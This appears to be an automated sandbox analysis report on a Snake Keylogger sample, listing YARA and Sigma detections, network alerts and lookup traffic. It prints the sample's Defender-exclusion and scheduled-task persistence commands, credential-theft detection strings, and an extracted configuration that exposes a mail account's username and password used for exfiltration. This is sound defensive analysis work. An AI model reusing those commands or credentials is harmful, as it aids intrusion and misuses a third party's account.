9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14e11:$a1: get_encryptedPassword 0x35031:$a1: get_encryptedPassword 0x152b7:$a2: get_encryptedUsername 0x354d7:$a2: get_encryptedUsername 0x14b71:$a3: get_timePasswordChanged 0x34d91:$a3: get_timePasswordChanged 0x14c7d:$a4: get_passwordField 0x34e9d:$a4: get_passwordField 0x14e27:$a5: set_encryptedPassword 0x35047:$a5: set_encryptedPassword 0x16ca7:$a6: get_passwords 0x36ec7:$a6: get_passwords 0x1702f:$a7: get_logins 0x3724f:$a7: get_logins 0x16c93:$a8: GetOutlookPasswords 0x36eb3:$a8: GetOutlookPasswords 0x168c0:$a9: StartKeylogger 0x36ae0:$a9: StartKeylogger 0x16f88:$a10: KeyLoggerEventArgs 0x371a8:$a10: KeyLoggerEventArgs 0x16938:$a11: KeyLoggerEventArgsEventHandler
9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bd21:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bf41:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1af53:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b173:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b386:$a4: \Orbitum\User Data\Default\Login Data 0x3b5a6:$a4: \Orbitum\User Data\Default\Login Data 0x1c3c5:$a5: \Kometa\User Data\Default\Login Data 0x3c5e5:$a5: \Kometa\User Data\Default\Login Data
9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15da3:$s1: UnHook 0x35fc3:$s1: UnHook 0x15daa:$s2: SetHook 0x35fca:$s2: SetHook 0x15db2:$s3: CallNextHook 0x35fd2:$s3: CallNextHook 0x15dbf:$s4: _hook 0x35fdf:$s4: _hook
9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1660d:$s8: GrabbedClp 0x3682d:$s8: GrabbedClp 0x168c0:$s9: StartKeylogger 0x36ae0:$s9: StartKeylogger 0x17c84:$x1: $%SMTPDV$ 0x37ea4:$x1: $%SMTPDV$ 0x17cea:$x2: $#TheHashHere%& 0x37f0a:$x2: $#TheHashHere%& 0x19323:$x3: %FTPDV$ 0x39543:$x3: %FTPDV$ 0x19417:$x4: $%TelegramDv$ 0x39637:$x4: $%TelegramDv$ 0x16938:$x5: KeyLoggerEventArgs 0x16f88:$x5: KeyLoggerEventArgs 0x36b58:$x5: KeyLoggerEventArgs 0x371a8:$x5: KeyLoggerEventArgs 0x19347:$m2: Clipboard Logs ID 0x19567:$m2: Screenshot Logs ID 0x19677:$m2: keystroke Logs ID 0x39567:$m2: Clipboard Logs ID 0x39787:$m2: Screenshot Logs ID
9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14e11:$a1: get_encryptedPassword 0x35231:$a1: get_encryptedPassword 0x55451:$a1: get_encryptedPassword 0x152b7:$a2: get_encryptedUsername 0x356d7:$a2: get_encryptedUsername 0x558f7:$a2: get_encryptedUsername 0x14b71:$a3: get_timePasswordChanged 0x34f91:$a3: get_timePasswordChanged 0x551b1:$a3: get_timePasswordChanged 0x14c7d:$a4: get_passwordField 0x3509d:$a4: get_passwordField 0x552bd:$a4: get_passwordField 0x14e27:$a5: set_encryptedPassword 0x35247:$a5: set_encryptedPassword 0x55467:$a5: set_encryptedPassword 0x16ca7:$a6: get_passwords 0x370c7:$a6: get_passwords 0x572e7:$a6: get_passwords 0x1702f:$a7: get_logins 0x3744f:$a7: get_logins 0x5766f:$a7: get_logins
9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bd21:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c141:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5c361:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1af53:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b373:$a3: \Google\Chrome\User Data\Default\Login Data 0x5b593:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b386:$a4: \Orbitum\User Data\Default\Login Data 0x3b7a6:$a4: \Orbitum\User Data\Default\Login Data 0x5b9c6:$a4: \Orbitum\User Data\Default\Login Data 0x1c3c5:$a5: \Kometa\User Data\Default\Login Data 0x3c7e5:$a5: \Kometa\User Data\Default\Login Data 0x5ca05:$a5: \Kometa\User Data\Default\Login Data
9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15da3:$s1: UnHook 0x361c3:$s1: UnHook 0x563e3:$s1: UnHook 0x15daa:$s2: SetHook 0x361ca:$s2: SetHook 0x563ea:$s2: SetHook 0x15db2:$s3: CallNextHook 0x361d2:$s3: CallNextHook 0x563f2:$s3: CallNextHook 0x15dbf:$s4: _hook 0x361df:$s4: _hook 0x563ff:$s4: _hook
9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1660d:$s8: GrabbedClp 0x36a2d:$s8: GrabbedClp 0x56c4d:$s8: GrabbedClp 0x168c0:$s9: StartKeylogger 0x36ce0:$s9: StartKeylogger 0x56f00:$s9: StartKeylogger 0x17c84:$x1: $%SMTPDV$ 0x380a4:$x1: $%SMTPDV$ 0x582c4:$x1: $%SMTPDV$ 0x17cea:$x2: $#TheHashHere%& 0x3810a:$x2: $#TheHashHere%& 0x5832a:$x2: $#TheHashHere%& 0x19323:$x3: %FTPDV$ 0x39743:$x3: %FTPDV$ 0x59963:$x3: %FTPDV$ 0x19417:$x4: $%TelegramDv$ 0x39837:$x4: $%TelegramDv$ 0x59a57:$x4: $%TelegramDv$ 0x16938:$x5: KeyLoggerEventArgs 0x16f88:$x5: KeyLoggerEventArgs 0x36d58:$x5: KeyLoggerEventArgs
0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14e11:$a1: get_encryptedPassword 0x35031:$a1: get_encryptedPassword 0x152b7:$a2: get_encryptedUsername 0x354d7:$a2: get_encryptedUsername 0x14b71:$a3: get_timePasswordChanged 0x34d91:$a3: get_timePasswordChanged 0x14c7d:$a4: get_passwordField 0x34e9d:$a4: get_passwordField 0x14e27:$a5: set_encryptedPassword 0x35047:$a5: set_encryptedPassword 0x16ca7:$a6: get_passwords 0x36ec7:$a6: get_passwords 0x1702f:$a7: get_logins 0x3724f:$a7: get_logins 0x16c93:$a8: GetOutlookPasswords 0x36eb3:$a8: GetOutlookPasswords 0x168c0:$a9: StartKeylogger 0x36ae0:$a9: StartKeylogger 0x16f88:$a10: KeyLoggerEventArgs 0x371a8:$a10: KeyLoggerEventArgs 0x16938:$a11: KeyLoggerEventArgsEventHandler
0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15da3:$s1: UnHook 0x35fc3:$s1: UnHook 0x15daa:$s2: SetHook 0x35fca:$s2: SetHook 0x15db2:$s3: CallNextHook 0x35fd2:$s3: CallNextHook 0x15dbf:$s4: _hook 0x35fdf:$s4: _hook
0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1660d:$s8: GrabbedClp 0x3682d:$s8: GrabbedClp 0x168c0:$s9: StartKeylogger 0x36ae0:$s9: StartKeylogger 0x17c84:$x1: $%SMTPDV$ 0x37ea4:$x1: $%SMTPDV$ 0x17cea:$x2: $#TheHashHere%& 0x37f0a:$x2: $#TheHashHere%& 0x19323:$x3: %FTPDV$ 0x39543:$x3: %FTPDV$ 0x19417:$x4: $%TelegramDv$ 0x39637:$x4: $%TelegramDv$ 0x16938:$x5: KeyLoggerEventArgs 0x16f88:$x5: KeyLoggerEventArgs 0x36b58:$x5: KeyLoggerEventArgs 0x371a8:$x5: KeyLoggerEventArgs 0x19347:$m2: Clipboard Logs ID 0x19567:$m2: Screenshot Logs ID 0x19677:$m2: keystroke Logs ID 0x39567:$m2: Clipboard Logs ID 0x39787:$m2: Screenshot Logs ID
0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14e11:$a1: get_encryptedPassword 0x35231:$a1: get_encryptedPassword 0x55451:$a1: get_encryptedPassword 0x152b7:$a2: get_encryptedUsername 0x356d7:$a2: get_encryptedUsername 0x558f7:$a2: get_encryptedUsername 0x14b71:$a3: get_timePasswordChanged 0x34f91:$a3: get_timePasswordChanged 0x551b1:$a3: get_timePasswordChanged 0x14c7d:$a4: get_passwordField 0x3509d:$a4: get_passwordField 0x552bd:$a4: get_passwordField 0x14e27:$a5: set_encryptedPassword 0x35247:$a5: set_encryptedPassword 0x55467:$a5: set_encryptedPassword 0x16ca7:$a6: get_passwords 0x370c7:$a6: get_passwords 0x572e7:$a6: get_passwords 0x1702f:$a7: get_logins 0x3744f:$a7: get_logins 0x5766f:$a7: get_logins
0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15da3:$s1: UnHook 0x361c3:$s1: UnHook 0x563e3:$s1: UnHook 0x15daa:$s2: SetHook 0x361ca:$s2: SetHook 0x563ea:$s2: SetHook 0x15db2:$s3: CallNextHook 0x361d2:$s3: CallNextHook 0x563f2:$s3: CallNextHook 0x15dbf:$s4: _hook 0x361df:$s4: _hook 0x563ff:$s4: _hook
0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1660d:$s8: GrabbedClp 0x36a2d:$s8: GrabbedClp 0x56c4d:$s8: GrabbedClp 0x168c0:$s9: StartKeylogger 0x36ce0:$s9: StartKeylogger 0x56f00:$s9: StartKeylogger 0x17c84:$x1: $%SMTPDV$ 0x380a4:$x1: $%SMTPDV$ 0x582c4:$x1: $%SMTPDV$ 0x17cea:$x2: $#TheHashHere%& 0x3810a:$x2: $#TheHashHere%& 0x5832a:$x2: $#TheHashHere%& 0x19323:$x3: %FTPDV$ 0x39743:$x3: %FTPDV$ 0x59963:$x3: %FTPDV$ 0x19417:$x4: $%TelegramDv$ 0x39837:$x4: $%TelegramDv$ 0x59a57:$x4: $%TelegramDv$ 0x16938:$x5: KeyLoggerEventArgs 0x16f88:$x5: KeyLoggerEventArgs 0x36d58:$x5: KeyLoggerEventArgs
Click to see the 52 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VQsnGWaNi5.exe", ParentImage: C:\Users\user\Desktop\VQsnGWaNi5.exe, ParentProcessId: 6532, ParentProcessName: VQsnGWaNi5.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe", ProcessId: 4996, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpD53.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpD53.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe, ParentImage: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe, ParentProcessId: 7384, ParentProcessName: ywKvCTGbQjXP.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpD53.tmp", ProcessId: 7624, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\VQsnGWaNi5.exe", ParentImage: C:\Users\user\Desktop\VQsnGWaNi5.exe, ParentProcessId: 6532, ParentProcessName: VQsnGWaNi5.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp", ProcessId: 6724, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VQsnGWaNi5.exe", ParentImage: C:\Users\user\Desktop\VQsnGWaNi5.exe, ParentProcessId: 6532, ParentProcessName: VQsnGWaNi5.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe", ProcessId: 4996, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\VQsnGWaNi5.exe", ParentImage: C:\Users\user\Desktop\VQsnGWaNi5.exe, ParentProcessId: 6532, ParentProcessName: VQsnGWaNi5.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp", ProcessId: 6724, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:32:40.839589+0100	2803305	3	Unknown Traffic	192.168.2.4	49739	104.21.48.1	443	TCP
2025-01-10T22:32:44.417507+0100	2803305	3	Unknown Traffic	192.168.2.4	49746	104.21.48.1	443	TCP
2025-01-10T22:32:45.134334+0100	2803305	3	Unknown Traffic	192.168.2.4	49749	104.21.48.1	443	TCP
2025-01-10T22:32:47.729870+0100	2803305	3	Unknown Traffic	192.168.2.4	49760	104.21.48.1	443	TCP
2025-01-10T22:32:49.940031+0100	2803305	3	Unknown Traffic	192.168.2.4	49770	104.21.48.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:32:38.643587+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49735	193.122.130.0	80	TCP
2025-01-10T22:32:40.346722+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49735	193.122.130.0	80	TCP
2025-01-10T22:32:41.522240+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	193.122.130.0	80	TCP
2025-01-10T22:32:42.124735+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-10T22:32:43.940649+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-10T22:32:45.018608+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49748	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000D.00000002.1884137452.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "hydcre@cepro.co.in", "Password": "2018@ce#03", "Host": "mail.cepro.co.in", "Port": "587", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

ReversingLabs: Detection: 86%

Multi AV Scanner detection for submitted file

Source: VQsnGWaNi5.exe	Virustotal: Detection: 75%			Perma Link
Source: VQsnGWaNi5.exe	ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: VQsnGWaNi5.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: VQsnGWaNi5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49737 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49744 version: TLS 1.0

Source: VQsnGWaNi5.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: KzwA.pdb source: VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr
Source:	Binary string: KzwA.pdbSHA256A source: VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 4x nop then jmp 078E9855h	0_2_078E8DAB
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 4x nop then jmp 078E9855h	0_2_078E8E60
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 4x nop then jmp 07D48B35h	9_2_07D4808B
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 4x nop then jmp 07D48B35h	9_2_07D48140

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.48.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
